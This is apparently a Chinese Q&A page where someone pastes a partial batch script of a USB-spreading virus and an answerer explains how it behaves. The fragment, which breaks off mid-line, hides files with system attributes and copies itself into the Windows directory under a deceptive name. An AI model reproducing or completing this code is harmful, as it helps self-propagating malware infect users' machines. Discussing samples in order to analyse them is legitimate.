关于反U盘病毒病毒?"?

来源:百度知道 编辑:UC知道 时间:2024/05/16 15:24:11
关于反U盘病毒病毒

病毒的脚本是这样的(部分):
@echo off
setlocal ENABLEDELAYEDEXPANSION ENABLEEXTENSIONS
cd /d "%~dp0"
if /i "%cd%"=="%~d0\" (explorer.exe "%~d0")
set v=01
set "endf=%systemdrive%\8bye.txt"
call:ie s.vbe
echo.Wscript.sleep 10000>s.vbe
attrib s.vbe +a +s +r +h
if /i not "%cd%"=="%systemroot%" (call:cb&del /a /f /q s.vbe&goto :eof)
set dl=CDEFGHIJKLMNOPQRSTUVWXYZ
set n=0
call:inf >inf.tem
call:ql
uda.a
md "%systemroot%\bakfiles\"
call:ie "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat"
copy uda-解压.bat "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat"
call:ie "%systemroot%\bakfiles\uda.a"
call:copy uda.a "%systemroot%\bakfiles\"
:s
echo. >uhere-%v%.txt
if exist "%endf%" (s

没人回答,请给我加分

他没有加载到系统进程,他只是利用explorer.exe将特定的文件夹打开

首先,他会判断是否在磁盘根目录运行的,如果是,则打开磁盘根目录,同时在执行其他的任务~~~

这个玩意我分析过,很佩服作者的逻辑能力和技术